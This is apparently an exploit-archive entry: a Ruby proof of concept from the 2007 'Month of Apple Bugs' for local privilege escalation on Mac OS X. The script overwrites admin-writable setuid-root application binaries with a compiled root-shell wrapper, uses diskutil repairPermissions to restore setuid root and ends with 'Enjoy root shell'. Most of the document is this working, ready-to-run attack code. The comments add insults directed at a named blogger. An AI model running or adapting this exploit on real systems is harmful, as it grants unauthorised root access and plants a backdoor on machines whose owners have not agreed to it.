Month of Apple Bugs - Proof of concept exploit for a local privilege escalation vulnerability on Mac OS X. Multiple binaries inside the /Applications directory tree are setuid root, but remain writable by users in the admin group (ex. first user by default in a non-server Mac OS X installation), allowing privilege escalation.
5d79f7e869386b86fb511af90c48ec4794090cc26d9550ab41fb92e9be07807c
# !/usr/bin/ruby
# Exploit for MOAB-15-01-2007
# (c) 2006 LMH <lmh [at] info-pull.com>.
#
# Note: It's a generic exploit, you can use it over any binary writable which
# is set as root setuid by diskutil repair permissions. Simply change the path.
# Blame Apple for doing such a piece of **** and relying on flawed DAC.
#
# Line-noise: Jackass of the Week
# -------
# On Jan 14, 11:10 pm, "William A. Carrel" <willia...@carrel.org> wrote:
# > Works for me. I see yesterday's was an HFS+ panic.
# > > Is the info-pull/MoAB/MoKB site down, or is it just me that can't
# > > access it?
# Sorry, my fault. I blocked access to it at this end when they started
# distributing malware so that nobody downloaded anything accidentally. I
# can see it again now.
#
# Kind regards,
#
# Alastair.
# --------
#
# Hmm, false, it was the other way around:
#
# target prot opt source destination
# (...)
# DROP all -- ajhoughton.plus.com anywhere
# (...)
#
# "LMH’s continued propensity for insults, which frankly I don’t particularly
# appreciate." -- http://alastairs-place.net/2007/01/how-childish/
#
# There's nothing wrong about embarrassing you for being an absurd liar.
# Live with it, and then post to your 'blog' as usual. Free Zealot Apple PR (tm).
#
require 'fileutils'
DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"
AVAILABLE_TARGETS = [
"/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
"/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
"/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
]
path_to_bin = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])
path_to_back = File.join("/tmp", File.basename(path_to_bin))
puts "++ Starting: #{path_to_bin}"
puts "++ Back-up: #{path_to_back}"
if File.exists?(path_to_bin)
unless File.exists?(path_to_back)
FileUtils.cp(path_to_bin, path_to_back)
end
end
puts "++ Compiling a shell wrapper at /tmp/o..."
WRAP_CODE = 'int main() { setuid(0); setgid(0); seteuid(0); system("/bin/sh -i"); }'
COMPILE = "echo '#{WRAP_CODE}' > /tmp/t.c && gcc /tmp/t.c -s -o /tmp/o && rm -rf /tmp/t.c"
system(COMPILE)
puts "++ Placing backdoor..."
FileUtils.mv("/tmp/o", path_to_bin)
system(DISK_UTIL_COMMAND)
puts "++ Finished. Backup at #{path_to_back}."
puts "++ Repair with: mv '#{path_to_back}' '#{path_to_bin}'"
puts "++ Enjoy root shell."